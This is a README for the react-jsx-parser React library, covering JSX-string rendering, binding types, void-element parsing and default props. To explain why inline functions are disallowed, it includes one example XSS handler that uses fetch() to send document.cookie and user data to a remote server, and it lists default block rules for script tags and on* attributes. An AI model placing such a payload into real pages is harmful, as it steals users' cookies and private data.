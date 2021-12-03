A React component which can parse JSX and output rendered React Components.

Basic Usage - Injecting JSX as a String

import React from 'react' import JsxParser from 'react-jsx-parser' import Library from 'some-library-of-components' class InjectableComponent extends Component { static defaultProps = { eventHandler : () => {} } } const MyComponent = () => ( <JsxParser bindings={{ foo: 'bar', myEventHandler: () => { /* ... do stuff ... */ }, }} components={{ InjectableComponent, Library }} jsx={` <h1>Header</h1> <InjectableComponent eventHandler={myEventHandler} truthyProp /> <Library.SomeComponent someProp={foo} calc={1 + 1} stringProp="foo" /> <Library.DataFetcher>((data) => <div>{data.name}</div>)</Library.DataFetcher> `} /> )

Because InjectableComponent is passed into the JsxParser.props.components prop, it is treated as a known element type, and created using React.createElement(...) when parsed out of the JSX. You can also pass in a whole collection of components, as shown by the Library binding, and then access the individual items with LibraryName.ComponentName .

Finally, a note about property bindings. The JsxParser can handle several types of binding:

implicit true bindings, such as <InjectableComponent truthyProp /> (equivalent to truthyProp={true} )

bindings, such as (equivalent to ) string-value binding, such as stringProp="foo"

expression-binding, such as calc={1 + 1}

named-value binding, such as eventHandler={myEventHandler} (note that this requires a match in bindings )

(note that this requires a match in ) simple single statement arrow expressions (item) => <p>{item.name}</p>

The component does not support inline function declarations, such as:

onClick={function (event) { /* do stuff */ }} , or

, or onKeyPress={event => { /* do stuff */}}

Function or arrow functions with bodies () => { return <p>This will not work</p> }

This is to prevent inadvertent XSS attack vectors. Since the primary use of this component is to allow JSX to be stored server-side, and then late-interpreted at the client-side, this restriction prevents a malicious user from stealing info by executing a situation like:

<JsxParser bindings={{ userInfo : { private : 'data' } }} onClick={() => { fetch( '/some/remote/server' , { body : JSON .stringify({ cookies : document .cookie, userInfo }) }) }} />

Advanced Usage - Injecting Dynamic JSX

import { ComponentA, ComponentB } from 'somePackage/Components' import ComponentC from 'somePackage/ComponentC' import ComponentD from 'somePackage/ComponentD' ... const dynamicHtml = loadRemoteData() ... <JsxParser bindings={bindings} components={{ ComponentA, ComponentB, ComponentC, ComponentD }} jsx={dynamicHtml} />

Any ComponentA , ComponentB , ComponentC or ComponentD tags in the dynamically loaded XML/HTML fragment will be rendered as React components. Any unrecognized tags will be handled by React .

Note: Non-standard tags may throw errors and warnings, but will typically be rendered in a reasonable way.

When rendering HTML, standards-adherent editors will render img , hr , br , and other void elements with no trailing /> . While this is valid HTML, it is not valid JSX. If you wish to opt-in to a more HTML-like parsing style, set the autoCloseVoidElements prop to true .

<JsxParser jsx= "<hr><div className='foo'>Foo</div>" /> <JsxParser jsx="<hr></hr><div className='foo'>Foo</div>" /> // Renders: <hr><div class='foo'>Foo</div> // This is valid HTML, and the `autoCloseVoidElements` prop allows it to render <JsxParser autoCloseVoidElements jsx="<hr><div className='foo'>Foo</div>" /> // Renders: <hr><div class='foo'>Foo</div> // This would work in a browser, but will no longer parse with `autoCloseVoidElements` <JsxParser autoCloseVoidElements jsx="<hr></hr><div className='foo'>Foo</div>" /> // Renders: null

PropTypes / Settings

JsxParser.defaultProps = { allowUnknownElements : true , autoCloseVoidElements : false , bindings : {}, blacklistedAttrs : [ /^on.+/i ], blacklistedTags : [ 'script' ], className : '' , components : {}, componentsOnly : false , disableFragments : false , disableKeyGeneration : false , jsx : '' , onError : () => {}, showWarnings : false , renderError : undefined , renderInWrapper : true , renderUnrecognized : tagName => null , }

Older Browser Support

If your application needs to support older browsers, like IE11 , import from react-jsx-parser/dist/es5/react-jsx-parser.min.js , which transpiles the acorn-jsx dependency down to ES5, and also adds additional polyfill support for code used in this package.

Note: not recommended for implementations which only support modern browsers, as the ES5 version is roughly 30% larger.